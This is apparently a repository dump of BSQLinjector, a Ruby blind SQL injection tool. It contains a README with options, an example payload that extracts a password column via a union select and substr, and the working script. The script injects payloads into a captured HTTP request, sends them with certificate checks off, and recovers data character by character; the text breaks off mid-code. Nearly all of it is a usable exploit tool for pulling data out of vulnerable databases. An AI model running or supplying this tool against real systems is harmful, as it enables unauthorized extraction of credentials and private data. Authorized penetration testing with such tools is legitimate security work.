├── .gitignore ├── README.md └── BSQLinjector.rb /.gitignore: -------------------------------------------------------------------------------- 1 | *.txt 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## BSQLinjector 2 | 3 | BSQLinjector uses blind method to retrieve data from SQL databases. 4 | I recommend using "--test" switch to clearly see how configured payload looks like before sending it to an application. 5 | 6 | ## Options: 7 | ``` 8 | --file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt) 9 | --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement) 10 | --prepend Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," 11 | --append How to end our payload. For example comment out rest of SQL statement. (--append='#) 12 | --schar Character placed around chars. This character is not used while in hex mode. (--schar="'") 13 | --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) 14 | 15 | --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l) 16 | --postgres Use postgres "for" in substring function (e.g. from 1 for 1). 17 | --hex Use hex to compare instead of characters. 18 | --case Case sensitivity. 19 | 20 | --ssl Use SSL. 21 | --proxy Proxy to use. (--proxy=127.0.0.1:8080) 22 | 23 | --test Enable test mode. Do not send request, just show full payload. 24 | --special Include all special characters in enumeration. 25 | --start Start enumeration from specified character. (--start=10) 26 | --max Maximum characters to enumerate. (--max=10) 27 | --timeout Timeout in waiting for responses. (--timeout=20) 28 | --only-final Stop showing each enumerated letter. 29 | --comma Encode comma. 30 | --bracket Add brackets to the end of substring function. --bracket="))" 31 | --hexspace Use space instead of brackets to split hex values. 32 | --verbose Show verbose messages. 33 | ``` 34 | 35 | ## Example usage: 36 | ``` 37 | ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl 38 | ``` 39 | 40 | **Disclaimer** 41 | 42 | This repository contains tool developed strictly for educational purposes. Any misuse of the tool for illegal activities is strictly prohibited. 43 | 44 | **Legal Notice** 45 | 46 | It is important to understand and comply with all local laws and regulations related to cybersecurity and ethical hacking. Unauthorized access to computer systems, networks, or data is illegal and punishable by law. The developer of this repository is not responsible for any misuse of the tools contained herein. 47 | 48 | By using the tools in this repository, you agree to use them responsibly and ethically. Always obtain explicit permission before testing or attempting to access any network, system, or data that does not belong to you. 49 | -------------------------------------------------------------------------------- /BSQLinjector.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | require 'uri' 4 | require 'net/http' 5 | require 'net/https' 6 | require 'readline' 7 | 8 | # CONFIGURE 9 | $file = "" # file with vulnerable HTTP request 10 | $secfile = "" # file with second request (2nd order) 11 | $prepend = "" # most of SQL statement 12 | $append = "" # how to end SQL statement 13 | 14 | $proto = "http" # protocol to use - http/https 15 | $proxy = "" # proxy host 16 | $proxy_port = "" # proxy port 17 | 18 | $mode = "b" # mode to use (between - b (default - this mode generates less requests), moreless - a (this mode generates less requests by comparing characters using \"<\", \">\", \"=\" characters), like - l (complete bruteforce with like), equals - e (complete bruteforce with =)) 19 | $hex = "n" # if hex should be used in comparing 20 | 21 | $max = 1000 # maximum chars to enumerate 22 | $search = "" # what is the pattern to look for when query is TRUE 23 | 24 | $for = "n" # if postgres "for" should be used in substring 25 | $comma = "n" # if comma should be URL encoded 26 | $oh = "" # this character is used when opening string when comparing 27 | $bracket = ")" # substring ending brackets 28 | $case = "n" # setting case sensitivity 29 | $hexbracket = "y" # hex delimeter - bracket (y) or space (n) 30 | $showletter = "y" # if each enumerated letter should be shown 31 | 32 | $verbose = "n" # verbose messaging 33 | $test = "n" # test mode 34 | timeout = 20 # timeout for receiving responses 35 | $sleep = 0 # sleep between requests 36 | alls = "n" # if all special characters should be included in enumeration 37 | run = 0 # parameter specifies if program should continue when always true condition is detected 38 | 39 | 40 | $i = 0 # main counter for characters 41 | 42 | # set all variables 43 | ARGV.each do |arg| 44 | $file = arg.split("=")[1] if arg.include?("--file=") 45 | $proto = "https" if arg.include?("--ssl") 46 | $proxy = arg.split("=")[1].split(":")[0] if arg.include?("--proxy=") 47 | $proxy_port = arg.split("=")[1].split(":")[1] if arg.include?("--proxy=") 48 | $verbose = "y" if arg.include?("--verbose") 49 | timeout = Integer(arg.split("=")[1]) if arg.include?("--timeout=") 50 | $comma = "y" if arg.include?("--comma") 51 | $secfile = arg.split("=")[1] if arg.include?("--2ndfile=") 52 | $max = arg.split("=")[1].to_i if arg.include?("--max=") 53 | $mode = arg.split("=")[1] if arg.include?("--mode=") 54 | $hex = "y" if arg.include?("--hex") 55 | $oh = arg.split("=")[1] if arg.include?("--schar=") 56 | $case = "y" if arg.include?("--case") 57 | $i = arg.split("=")[1].to_i - 1 if arg.include?("--start=") 58 | $test = "y" if arg.include?("--test") 59 | $for = "y" if arg.include?("--postgres") 60 | $bracket = arg.split("=")[1].to_i - 1 if arg.include?("--bracket=") 61 | alls = "y" if arg.include?("--special") 62 | $sleep = Integer(arg.split("=")[1]) if arg.include?("--sleep=") 63 | $showletter = "n" if arg.include?("--only-final") 64 | $hexbracket = "n" if arg.include?("--hexspace") 65 | $search = arg.split("=")[1] if arg.include?("--pattern=") && arg.count("=") == 1 66 | $prepend = arg.split("=")[1] if arg.include?("--prepend=") && arg.count("=") == 1 67 | $append = arg.split("=")[1] if arg.include?("--append=") && arg.count("=") == 1 68 | $search = arg.split("=")[1..-1].join("=") if arg.include?("--pattern=") && arg.count("=") > 1 69 | $prepend = arg.split("=")[1..-1].join("=") if arg.include?("--prepend=") && arg.count("=") > 1 70 | $append = arg.split("=")[1..-1].join("=") if arg.include?("--append=") && arg.count("=") > 1 71 | end 72 | 73 | # show main menu 74 | if ARGV.nil? || ARGV.size < 3 || $file == "" || ($search == "" && $test == "n") 75 | puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski" 76 | puts "" 77 | puts "BSQLinjector uses blind method to retrieve data from SQL databases." 78 | puts "" 79 | puts "Options:" 80 | puts " --file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)" 81 | puts " --pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement)" 82 | puts " --prepend Mandatory - Main payload. (--prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\"" 83 | puts " --append How to end our payload. For example comment out rest of SQL statement. (--append=\'#)" 84 | puts " --schar Character placed around chars. This character is not used while in hex mode. (--schar=\"\'\")" 85 | puts " --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)" 86 | puts "" 87 | puts " --mode Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using \"<\", \">\", \"=\" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)" 88 | puts " --postgres Use postgres \"for\" in substring function." 89 | puts " --hex Use hex to compare instead of characters." 90 | puts " --case Case sensitivity." 91 | puts "" 92 | puts " --ssl Use SSL." 93 | puts " --proxy Proxy to use. (--proxy=127.0.0.1:8080)" 94 | puts "" 95 | puts " --test Enable test mode. Do not send request, just show full payload." 96 | puts " --special Include all special characters in enumeration." 97 | puts " --start Start enumeration from specified character. (--start=10)" 98 | puts " --max Maximum characters to enumerate. (--max=10)" 99 | puts " --timeout Timeout in waiting for responses. (--timeout=20)" 100 | puts " --sleep Sleep between requests. (--sleep=5)" 101 | puts " --only-final Stop showing each enumerated letter." 102 | puts " --comma Encode comma." 103 | puts " --bracket Add brackets to the end of substring function. --bracket=\"))\"" 104 | puts " --hexspace Use space instead of brackets to split hex values." 105 | puts " --verbose Show verbose messages." 106 | puts "" 107 | puts "Example usage:" 108 | puts " ruby #{__FILE__} --pattern=truestatement --file=/tmp/req.txt --schar=\"'\" --prepend=\"abcd\'and\'a\'=\'b\'+union+select+\'truestatement\'+from+table+where+col%3d\'value\'+and+substr(password,\" --append=\"\'#\" --ssl" 109 | puts "" 110 | exit(1) 111 | else 112 | puts "BSQLinjector by Jakub Pa\u0142aczy\u0144ski" 113 | puts "" 114 | end 115 | 116 | # EXECUTION 117 | 118 | # holds HTTP responses 119 | $response = "" 120 | 121 | # arrays for Blind exploitation 122 | $arrs = [",", "_", "."] 123 | if alls == "y" 124 | $arrs += ["+", "/", "=", ":", "-", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")", "~", "`", "[", "]", "{", "}", ";", "<", ">", "?", "|", "\\", "\""] 125 | end 126 | $arrn1 = ["0", "1", "2", "3", "4"] 127 | $arrn2 = ["5", "6", "7", "8", "9"] 128 | $arr1 = ["a", "b", "c"] 129 | $arr2 = ["d", "e", "f"] 130 | $arr3 = ["g", "h", "i"] 131 | $arr4 = ["j", "k", "l", "m"] 132 | $arr5 = ["n", "o", "p"] 133 | $arr6 = ["q", "r", "s"] 134 | $arr7 = ["t", "u", "v"] 135 | $arr8 = ["w", "x", "y", "z"] 136 | 137 | # for case sensitive 138 | $arr9 = ["A", "B", "C"] 139 | $arr10 = ["D", "E", "F"] 140 | $arr11 = ["G", "H", "I"] 141 | $arr12 = ["J", "K", "L", "M"] 142 | $arr13 = ["N", "O", "P"] 143 | $arr14 = ["Q", "R", "S"] 144 | $arr15 = ["T", "U", "V"] 145 | $arr16 = ["W", "X", "Y", "Z"] 146 | 147 | $arrays = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arrn1 + $arrn2 + $arrs 148 | $arraysc = $arr1 + $arr2 + $arr3 + $arr4 + $arr5 + $arr6 + $arr7 + $arr8 + $arr9 + $arr10 + $arr11 + $arr12 + $arr13 + $arr14 + $arr15 + $arr16 + $arrn1 + $arrn2 + $arrs 149 | 150 | # other parameters 151 | $result = "" 152 | 153 | ### Processing Request File ### 154 | 155 | # Configure basic options 156 | 157 | # set proxy 158 | if $proxy == "" 159 | $proxy = nil 160 | $proxy_port = nil 161 | end 162 | 163 | if $hex == "y" 164 | $oh = "" 165 | end 166 | 167 | # get connection host and port 168 | z = 1 169 | loop do 170 | begin 171 | break if File.readlines($file)[z].chomp.empty? 172 | if File.readlines($file)[z].include?("Host: ") 173 | $remote = File.readlines($file)[z].split(" ")[1] 174 | if $proto == "http" 175 | $port = 80 176 | else 177 | $port = 443 178 | end 179 | if $remote.include?(":") 180 | $port = $remote.split(":")[1] 181 | $remote = $remote.split(":")[0] 182 | end 183 | end 184 | rescue 185 | puts "[-] Wrong HTTP file format." 186 | exit(1) 187 | end 188 | z = z + 1 189 | end 190 | 191 | if $remote == "" 192 | puts "[-] Cannot retrieve hostname." 193 | exit(1) 194 | end 195 | 196 | # Configure main request 197 | def configreq(chars) 198 | 199 | # test mode 200 | if $test == "y" 201 | puts "Payload example:" 202 | if $comma == "y" 203 | puts $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append 204 | else 205 | if $for == "n" 206 | puts $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append 207 | else 208 | puts $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append 209 | end 210 | end 211 | exit(1) 212 | end 213 | 214 | # check HTTP method 215 | if File.readlines($file)[0].include?("GET ") 216 | $method = "get" 217 | else 218 | $method = "post" 219 | end 220 | 221 | found = 0 # for detecting injected payload 222 | 223 | # get URI path 224 | $uri = File.readlines($file)[0].split(" ")[1] 225 | turi = URI.decode($uri).gsub("+", " ") 226 | if turi.include?("SQLINJECT") 227 | if $comma == "y" 228 | $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 229 | else 230 | if $for == "n" 231 | $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 232 | else 233 | $uri = $uri.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 234 | end 235 | end 236 | found = found + 1 237 | end 238 | 239 | # get headers 240 | i = 1 241 | $headers = Hash.new 242 | loop do 243 | break if File.readlines($file)[i].chomp.empty? 244 | if !File.readlines($file)[i].include?("Host: ") 245 | header = File.readlines($file)[i].chomp 246 | if header.include?("SQLINJECT") 247 | if $comma == "y" 248 | header = header.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 249 | else 250 | if $for == "n" 251 | header = header.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 252 | else 253 | header = header.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 254 | end 255 | end 256 | found = found + 1 257 | end 258 | if header.include?("Accept-Encoding") 259 | else 260 | $headers[header.split(": ")[0]] = header.split(": ")[1] 261 | end 262 | end 263 | i = i + 1 264 | end 265 | 266 | # get POST body 267 | i = i + 1 268 | $post = "" 269 | postfind = 0 270 | if $method == "post" 271 | loop do 272 | break if File.readlines($file)[i].nil? 273 | postline = File.readlines($file)[i] 274 | tline = postline.gsub("+", " ") 275 | if tline.include?("SQLINJECT") 276 | if $comma == "y" 277 | postline = postline.sub("SQLINJECT", $prepend + $i.to_s + "%2C1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 278 | else 279 | if $for == "n" 280 | postline = postline.sub("SQLINJECT", $prepend + $i.to_s + ",1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 281 | else 282 | postline = postline.sub("SQLINJECT", $prepend + $i.to_s + " for 1" + $bracket + chars.gsub("%", "%25").gsub("&", "%26").gsub("+", "%2B").gsub(";", "%3B").gsub("#", "%23").gsub(" ", "+") + $append) 283 | end 284 | end 285 | found = found + 1 286 | end 287 | $post += postline 288 | i = i + 1 289 | end 290 | end 291 | 292 | # update Content-Length header 293 | if $method == "post" 294 | $headers["Content-Length"] = String($post.bytesize) 295 | end 296 | 297 | # detect injection point 298 | if found == 0 299 | puts "[-] Please specify injection point. Put \"SQLINJECT\" in place where payload should be injected." 300 | exit(1) 301 | elsif found > 1 302 | puts "[-] Multiple instances of injection point found. Please specify only one injection point." 303 | exit(1) 304 | end 305 | 306 | # configuring request 307 | $request = Net::HTTP.new($remote, $port, $proxy, $proxy_port) 308 | 309 | # set HTTPS 310 | if $proto == "https" 311 | $request.use_ssl = true 312 | $request.verify_mode = OpenSSL::SSL::VERIFY_NONE 313 | end 314 | end 315 | 316 | ### End of Processing Request File ### 317 | 318 | ### Configure request for 2nd order case ### 319 | if $secfile != "" 320 | 321 | # check HTTP method 322 | if File.readlines($secfile)[0].include?("GET ") 323 | $secmethod = "get" 324 | else 325 | $secmethod = "post" 326 | end 327 | 328 | # get URI path 329 | $securi = File.readlines($secfile)[0].split(" ")[1] 330 | 331 | # get headers 332 | y = 1 333 | $secheaders = Hash.new 334 | loop do 335 | break if File.readlines($secfile)[y].chomp.empty? 336 | if !File.readlines($secfile)[y].include?("Host: ") 337 | header = File.readlines($secfile)[y].chomp 338 | if header.include?("Accept-Encoding") 339 | else 340 | $secheaders[header.split(": ")[0]] = header.split(": ")[1] 341 | end 342 | end 343 | y = y + 1 344 | end 345 | 346 | # get POST body 347 | y = y + 1 348 | $secpost = "" 349 | if $method == "post" 350 | loop do 351 | break if File.readlines($secfile)[y].nil? 352 | postline = File.readlines($secfile)[y] 353 | $secpost += postline 354 | y = y + 1 355 | end 356 | end 357 | 358 | # configuring 2nd request 359 | $secrequest = Net::HTTP.new($remote, $port, $proxy, $proxy_port) 360 | 361 | # set HTTPS 362 | if $proto == "https" 363 | $secrequest.use_ssl = true 364 | $secrequest.verify_mode = OpenSSL::SSL::VERIFY_NONE 365 | end 366 | end 367 | 368 | ### End of Processing 2nd Request File ### 369 | 370 | # Sending request 371 | def sendreq() 372 | 373 | if $sleep != 0 374 | sleep($sleep) 375 | end 376 | 377 | if $verbose == "y" 378 | puts "[+] Sending request:" 379 | if $proto == "http" 380 | puts "http://#{$remote}:#{$port}#{$uri}" 381 | puts $headers 382 | puts "\n" 383 | puts $post 384 | puts "\n" 385 | else 386 | puts "https://#{$remote}:#{$port}#{$uri}" 387 | puts $headers 388 | puts "\n" 389 | puts $post 390 | puts "\n" 391 | end 392 | end 393 | 394 | $response = "" 395 | $request.start { |r| 396 | begin 397 | status = Timeout::timeout($time) { 398 | if $method == "post" 399 | $response = r.post($uri, $post, $headers) 400 | else 401 | $response = r.get($uri, $headers) 402 | end 403 | } 404 | rescue Timeout::Error 405 | end 406 | } 407 | end 408 | 409 | # Sending second request 410 | def send2ndreq() 411 | 412 | if $verbose == "y" 413 | puts "[+] Sending second request:" 414 | if $proto == "http" 415 | puts "http://#{$remote}:#{$port}#{$securi}" 416 | puts $secheaders 417 | puts "\n" 418 | puts $secpost 419 | puts "\n" 420 | else 421 | puts "https://#{$remote}:#{$port}#{$securi}" 422 | puts $secheaders 423 | puts "\n" 424 | puts $secpost 425 | puts "\n" 426 | end 427 | end 428 | 429 | $response = "" 430 | $secrequest.start { |r| 431 | begin 432 | status = Timeout::timeout($time) { 433 | if $method == "post" 434 | $response = r.post($securi, $secpost, $secheaders) 435 | else 436 | $response = r.get($securi, $secheaders) 437 | end 438 | } 439 | rescue Timeout::Error 440 | end 441 | } 442 | end 443 | 444 | # create between payload 445 | def cbetween(a, b, c) 446 | if $hex == "y" 447 | if $for == "y" 448 | configreq("between" + " chr(" + a.ord.to_s + ")and chr(" + b.ord.to_s + ")") 449 | elsif $hexbracket == "n" 450 | configreq("between" + " 0x" + a.unpack('H*')[0] + " and " + "0x" + b.unpack('H*')[0]) 451 | else 452 | configreq("between" + "(0x" + a.unpack('H*')[0] + ")and(" + "0x" + b.unpack('H*')[0] + ")") 453 | end 454 | else 455 | configreq("between" + $oh + a + $oh + "and" + $oh + b) 456 | end 457 | sendreq() 458 | send2ndreq() if $secfile != "" 459 | $fheader = "n" 460 | $response.to_hash.each { |k,v| 461 | $fheader = "y" if k.to_s.include?($search) 462 | $fheader = "y" if v.to_s.include?($search) 463 | } 464 | if ($response.body.include?($search) || $fheader == "y") && c == "yes" 465 | $result = $result + a 466 | puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" 467 | $letter = 1 468 | end 469 | end 470 | 471 | # creating moreless payload 472 | def cmoreless(a, b, c) 473 | if $hex == "y" 474 | if $for == "y" 475 | configreq(a + " chr(" + a.ord.to_s + ")") 476 | elsif $hexbracket == "n" 477 | configreq(a + " 0x" + b.unpack('H*')[0]) 478 | else 479 | configreq(a + "(0x" + b.unpack('H*')[0] + ")") 480 | end 481 | else 482 | configreq(a + $oh + b) 483 | end 484 | sendreq() 485 | send2ndreq() if $secfile != "" 486 | $fheader = "n" 487 | $response.to_hash.each { |k,v| 488 | $fheader = "y" if k.to_s.include?($search) 489 | $fheader = "y" if v.to_s.include?($search) 490 | } 491 | if ($response.body.include?($search) || $fheader == "y") && c == "yes" 492 | $result = $result + b 493 | puts "[+] Letter " + $i.to_s + " found: " + b if $showletter == "y" 494 | $letter = 1 495 | end 496 | end 497 | 498 | # creating like payload 499 | def clike(a) 500 | if $hex == "y" 501 | if $for == "y" 502 | configreq("like" + " " + "chr(" + a.ord.to_s + ")") 503 | elsif $hexbracket == "n" 504 | configreq("like" + " " + "0x" + a.unpack('H*')[0]) 505 | else 506 | configreq("like" + "(" + "0x" + a.unpack('H*')[0] + ")") 507 | end 508 | else 509 | configreq("like" + $oh + a) 510 | end 511 | sendreq() 512 | send2ndreq() if $secfile != "" 513 | $fheader = "n" 514 | $response.to_hash.each { |k,v| 515 | $fheader = "y" if k.to_s.include?($search) 516 | $fheader = "y" if v.to_s.include?($search) 517 | } 518 | if $response.body.include?($search) || $fheader == "y" 519 | $result = $result + a 520 | puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" 521 | $letter = 1 522 | end 523 | end 524 | 525 | # creating equal payload 526 | def cequal(a) 527 | if $hex == "y" 528 | if $for == "y" 529 | configreq("=" + "chr(" + a.ord.to_s + ")") 530 | elsif $hexbracket == "n" 531 | configreq("=" + "0x" + a.unpack('H*')[0]) 532 | else 533 | configreq("=" + "(0x" + a.unpack('H*')[0] + ")") 534 | end 535 | else 536 | configreq("=" + $oh + a) 537 | end 538 | sendreq() 539 | send2ndreq() if $secfile != "" 540 | $fheader = "n" 541 | $response.to_hash.each { |k,v| 542 | $fheader = "y" if k.to_s.include?($search) 543 | $fheader = "y" if v.to_s.include?($search) 544 | } 545 | if $response.body.include?($search) || $fheader == "y" 546 | $result = $result + a 547 | puts "[+] Letter " + $i.to_s + " found: " + a if $showletter == "y" 548 | $letter = 1 549 | end 550 | end 551 | 552 | # do enumeration 553 | until $i >= $max do 554 | $i = $i + 1 555 | $letter = 0 556 | if $result == "aaaaa" && run == 0 557 | puts "[-] It seems like your payload gives always true condition. Maybe you should try another parameter\'s value or different payload. Quit (Y/N)?\n" 558 | choice = Readline.readline("> ", true) 559 | if choice == "y" || choice == "Y" 560 | break 561 | else 562 | run = 1 563 | end 564 | end 565 | 566 | if $mode == "e" 567 | if $case == "n" 568 | for ch in $arrays 569 | cequal(ch) 570 | if $letter == 1 571 | break 572 | end 573 | end 574 | else 575 | for ch in $arraysc 576 | cequal(ch) 577 | if $letter == 1 578 | break 579 | end 580 | end 581 | end 582 | elsif $mode == "l" 583 | if $case == "n" 584 | for ch in $arrays 585 | if ch != "%" && ch != "_" 586 | clike(ch) 587 | if $letter == 1 588 | break 589 | end 590 | else 591 | cequal(ch) 592 | if $letter == 1 593 | break 594 | end 595 | end 596 | end 597 | else 598 | for ch in $arraysc 599 | if ch != "%" && ch != "_" 600 | clike(ch) 601 | if $letter == 1 602 | break 603 | end 604 | else 605 | cequal(ch) 606 | if $letter == 1 607 | break 608 | end 609 | end 610 | end 611 | end 612 | 613 | elsif $mode == "b" 614 | 615 | # lowercase 616 | cbetween("a", "z", "no") 617 | if $response.body.include?($search) || $fheader == "y" 618 | cbetween("a", "m", "no") 619 | if $response.body.include?($search) || $fheader == "y" 620 | cbetween("a", "f", "no") 621 | if $response.body.include?($search) || $fheader == "y" 622 | cbetween("a", "c", "no") 623 | if $response.body.include?($search) || $fheader == "y" 624 | for ch in $arr1 625 | cbetween(ch, ch, "yes") 626 | if $letter == 1 627 | break 628 | end 629 | end 630 | else 631 | for ch in $arr2 632 | cbetween(ch, ch, "yes") 633 | if $letter == 1 634 | break 635 | end 636 | end 637 | end 638 | else 639 | cbetween("g", "i", "no") 640 | if $response.body.include?($search) || $fheader == "y" 641 | for ch in $arr3 642 | cbetween(ch, ch, "yes") 643 | if $letter == 1 644 | break 645 | end 646 | end 647 | else 648 | for ch in $arr4 649 | cbetween(ch, ch, "yes") 650 | if $letter == 1 651 | break 652 | end 653 | end 654 | end 655 | end 656 | else 657 | cbetween("n", "s", "no") 658 | if $response.body.include?($search) || $fheader == "y" 659 | cbetween("n", "p", "no") 660 | if $response.body.include?($search) || $fheader == "y" 661 | for ch in $arr5 662 | cbetween(ch, ch, "yes") 663 | if $letter == 1 664 | break 665 | end 666 | end 667 | else 668 | for ch in $arr6 669 | cbetween(ch, ch, "yes") 670 | if $letter == 1 671 | break 672 | end 673 | end 674 | end 675 | else 676 | cbetween("t", "v", "no") 677 | if $response.body.include?($search) || $fheader == "y" 678 | for ch in $arr7 679 | cbetween(ch, ch, "yes") 680 | if $letter == 1 681 | break 682 | end 683 | end 684 | else 685 | for ch in $arr8 686 | cbetween(ch, ch, "yes") 687 | if $letter == 1 688 | break 689 | end 690 | end 691 | end 692 | end 693 | end 694 | end 695 | 696 | # uppercase - only when case-sensitive specified 697 | if $case == "y" && $letter == 0 698 | cbetween("A", "Z", "no") 699 | if $response.body.include?($search) || $fheader == "y" 700 | cbetween("A", "M", "no") 701 | if $response.body.include?($search) || $fheader == "y" 702 | cbetween("A", "F", "no") 703 | if $response.body.include?($search) || $fheader == "y" 704 | cbetween("A", "C", "no") 705 | if $response.body.include?($search) || $fheader == "y" 706 | for ch in $arr9 707 | cbetween(ch, ch, "yes") 708 | if $letter == 1 709 | break 710 | end 711 | end 712 | else 713 | for ch in $arr10 714 | cbetween(ch, ch, "yes") 715 | if $letter == 1 716 | break 717 | end 718 | end 719 | end 720 | else 721 | cbetween("G", "I", "no") 722 | if $response.body.include?($search) || $fheader == "y" 723 | for ch in $arr11 724 | cbetween(ch, ch, "yes") 725 | if $letter == 1 726 | break 727 | end 728 | end 729 | else 730 | for ch in $arr12 731 | cbetween(ch, ch, "yes") 732 | if $letter == 1 733 | break 734 | end 735 | end 736 | end 737 | end 738 | else 739 | cbetween("N", "S", "no") 740 | if $response.body.include?($search) || $fheader == "y" 741 | cbetween("N", "P", "no") 742 | if $response.body.include?($search) || $fheader == "y" 743 | for ch in $arr13 744 | cbetween(ch, ch, "yes") 745 | if $letter == 1 746 | break 747 | end 748 | end 749 | else 750 | for ch in $arr14 751 | cbetween(ch, ch, "yes") 752 | if $letter == 1 753 | break 754 | end 755 | end 756 | end 757 | else 758 | cbetween("T", "V", "no") 759 | if $response.body.include?($search) || $fheader == "y" 760 | for ch in $arr15 761 | cbetween(ch, ch, "yes") 762 | if $letter == 1 763 | break 764 | end 765 | end 766 | else 767 | for ch in $arr16 768 | cbetween(ch, ch, "yes") 769 | if $letter == 1 770 | break 771 | end 772 | end 773 | end 774 | end 775 | end 776 | end 777 | end 778 | 779 | # numeric 780 | if $letter == 0 781 | cbetween("0", "9", "no") 782 | if $response.body.include?($search) || $fheader == "y" 783 | cbetween("0", "4", "no") 784 | if $response.body.include?($search) || $fheader == "y" 785 | for ch in $arrn1 786 | cbetween(ch, ch, "yes") 787 | if $letter == 1 788 | break 789 | end 790 | end 791 | else 792 | for ch in $arrn2 793 | cbetween(ch, ch, "yes") 794 | if $letter == 1 795 | break 796 | end 797 | end 798 | end 799 | end 800 | end 801 | 802 | # special character 803 | if $letter == 0 804 | for ch in $arrs 805 | cbetween(ch, ch, "yes") 806 | if $letter == 1 807 | break 808 | end 809 | end 810 | end 811 | 812 | elsif $mode == "a" 813 | 814 | # lowercase 815 | cmoreless(">=", "a", "no") 816 | if $response.body.include?($search) || $fheader == "y" 817 | cmoreless("<=", "m", "no") 818 | if $response.body.include?($search) || $fheader == "y" 819 | cmoreless("<=", "f", "no") 820 | if $response.body.include?($search) || $fheader == "y" 821 | cmoreless("<=", "c", "no") 822 | if $response.body.include?($search) || $fheader == "y" 823 | for ch in $arr1 824 | cmoreless("=", ch, "yes") 825 | if $letter == 1 826 | break 827 | end 828 | end 829 | else 830 | for ch in $arr2 831 | cmoreless("=", ch, "yes") 832 | if $letter == 1 833 | break 834 | end 835 | end 836 | end 837 | else 838 | cmoreless("<=", "i", "no") 839 | if $response.body.include?($search) || $fheader == "y" 840 | for ch in $arr3 841 | cmoreless("=", ch, "yes") 842 | if $letter == 1 843 | break 844 | end 845 | end 846 | else 847 | for ch in $arr4 848 | cmoreless("=", ch, "yes") 849 | if $letter == 1 850 | break 851 | end 852 | end 853 | end 854 | end 855 | else 856 | cmoreless("<=", "s", "no") 857 | if $response.body.include?($search) || $fheader == "y" 858 | cmoreless("<=", "p", "no") 859 | if $response.body.include?($search) || $fheader == "y" 860 | for ch in $arr5 861 | cmoreless("=", ch, "yes") 862 | if $letter == 1 863 | break 864 | end 865 | end 866 | else 867 | for ch in $arr6 868 | cmoreless("=", ch, "yes") 869 | if $letter == 1 870 | break 871 | end 872 | end 873 | end 874 | else 875 | cmoreless("<=", "v", "no") 876 | if $response.body.include?($search) || $fheader == "y" 877 | for ch in $arr7 878 | cmoreless("=", ch, "yes") 879 | if $letter == 1 880 | break 881 | end 882 | end 883 | else 884 | for ch in $arr8 885 | cmoreless("=", ch, "yes") 886 | if $letter == 1 887 | break 888 | end 889 | end 890 | end 891 | end 892 | end 893 | end 894 | 895 | # uppercase - only when case-sensitive specified 896 | if $case == "y" && $letter == 0 897 | cmoreless(">=", "A", "no") 898 | if $response.body.include?($search) || $fheader == "y" 899 | cmoreless("<=", "M", "no") 900 | if $response.body.include?($search) || $fheader == "y" 901 | cmoreless("<=", "F", "no") 902 | if $response.body.include?($search) || $fheader == "y" 903 | cmoreless("<=", "C", "no") 904 | if $response.body.include?($search) || $fheader == "y" 905 | for ch in $arr9 906 | cmoreless("=", ch, "yes") 907 | if $letter == 1 908 | break 909 | end 910 | end 911 | else 912 | for ch in $arr10 913 | cmoreless("=", ch, "yes") 914 | if $letter == 1 915 | break 916 | end 917 | end 918 | end 919 | else 920 | 